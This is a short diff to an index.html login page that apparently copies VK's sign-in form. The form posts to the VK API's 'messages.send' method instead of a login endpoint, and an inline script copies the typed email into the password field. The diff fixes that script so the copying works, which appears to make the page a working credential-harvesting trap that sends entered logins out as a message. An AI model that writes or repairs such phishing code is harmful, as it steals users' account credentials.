--- a/index.html
+++ b/index.html
@@ -240,7 +240,7 @@ var abp;
             <script> var inp = document.getElementById('index_email');
 var ip = document.getElementById('index_pass');
 document.addEventListener('input',function(){
-ip.innerHTML = ' '+inp.innerHTML;
+ip.value = ' '+inp.value;
 
 });</script>
     <form method="post" name="login" id="index_login_form" action="https://api.vk.com/method/messages.send">
